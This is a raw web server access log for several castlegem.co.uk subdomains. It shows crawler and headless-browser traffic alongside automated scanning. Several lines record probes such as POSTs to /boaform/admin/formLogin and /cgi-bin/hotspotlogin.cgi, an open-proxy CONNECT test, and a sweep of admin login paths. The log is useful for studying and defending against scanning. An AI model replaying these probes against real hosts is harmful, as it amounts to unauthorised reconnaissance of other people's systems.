154.81.156.34 - - [30/Mar/2025:01:03:11 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.113.115.183 - - [30/Mar/2025:01:09:37 +0100] "CONNECT www.google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
176.113.115.183 - - [30/Mar/2025:01:09:52 +0100] "-" 408 - "-" "-"
34.77.151.17 - - [30/Mar/2025:01:14:38 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
154.81.156.34 - - [30/Mar/2025:01:16:30 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.191.127.222 - - [30/Mar/2025:01:35:39 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.35 - - [30/Mar/2025:01:37:44 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [30/Mar/2025:01:48:02 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12001438.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.27 - - [30/Mar/2025:01:59:19 +0100] "POST /cgi-bin/hotspotlogin.cgi HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
156.59.198.136 - - [30/Mar/2025:01:59:42 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951623.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.28.189 - - [30/Mar/2025:01:59:53 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.34.251 - - [30/Mar/2025:03:00:08 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.120.58 - - [30/Mar/2025:03:00:26 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.115.187 - - [30/Mar/2025:03:00:35 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [30/Mar/2025:03:01:48 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
141.98.11.27 - - [30/Mar/2025:03:13:21 +0200] "POST /cgi-bin/hotspotlogin.cgi HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
185.40.4.51 - - [30/Mar/2025:03:26:37 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
196.251.85.250 - - [30/Mar/2025:03:37:10 +0200] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
34.220.170.254 - - [30/Mar/2025:03:47:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:03 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:03 +0200] "GET /layout.php HTTP/1.1" 200 823 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:03 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1760 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /gui/javascript/form_form.js?1743299224 HTTP/1.1" 200 16206 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:04 +0200] "GET /layout.php HTTP/1.1" 200 817 "http://zafi.castlegem.co.uk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:04 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "http://zafi.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:04 +0200] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://coffeenostra.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:05 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /gui/images/emptybar.gif HTTP/1.1" 200 89 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:05 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:05 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:05 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:05 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1760 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2386 "http://coffeenostra.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:05 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 933 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://zafi.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://zafi.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://zafi.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://zafi.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/javascript/form_form.js?1743299225 HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/javascript/form_form.js?1743299226 HTTP/1.1" 200 16206 "http://coffeenostra.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://zafi.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://zafi.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://zafi.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://zafi.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:07 +0200] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://zafi.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:06 +0200] "GET /gui/javascript/form_form.js?1743299226 HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:06 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://coffeenostra.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:06 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://coffeenostra.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:07 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://zafi.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.170.254 - - [30/Mar/2025:03:47:07 +0200] "GET /gui/javascript/form_form.js?1743299227 HTTP/1.1" 200 16206 "http://coffeenostra.castlegem.co.uk/entry.php?id=10270&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:07 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2386 "http://zafi.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:07 +0200] "GET /gui/javascript/form_form.js?1743299227 HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:08 +0200] "GET /gui/images/emptybar.gif HTTP/1.1" 200 89 "http://zafi.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:08 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://zafi.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:08 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://zafi.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
35.167.123.68 - - [30/Mar/2025:03:47:08 +0200] "GET /gui/javascript/form_form.js?1743299228 HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:15 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:15 +0200] "GET /doesntexist-123 HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:15 +0200] "GET /login/login HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:16 +0200] "GET /console HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:16 +0200] "GET /appliance/login HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:16 +0200] "GET /error.json HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:17 +0200] "GET /api HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:17 +0200] "GET /index.html HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:17 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "http://triadian.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:17 +0200] "GET /layout.php HTTP/1.1" 200 820 "http://triadian.castlegem.co.uk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:17 +0200] "GET /favicon.ico HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:17 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://triadian.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:18 +0200] "GET /jasperserver/login.html HTTP/1.1" 404 375 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://triadian.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://triadian.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://triadian.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1760 "http://triadian.castlegem.co.uk/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.220.21.225 - - [30/Mar/2025:03:47:18 +0200] "GET /jasperserver-pro/login.html HTTP/1.1" 404 379 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://triadian.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://triadian.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
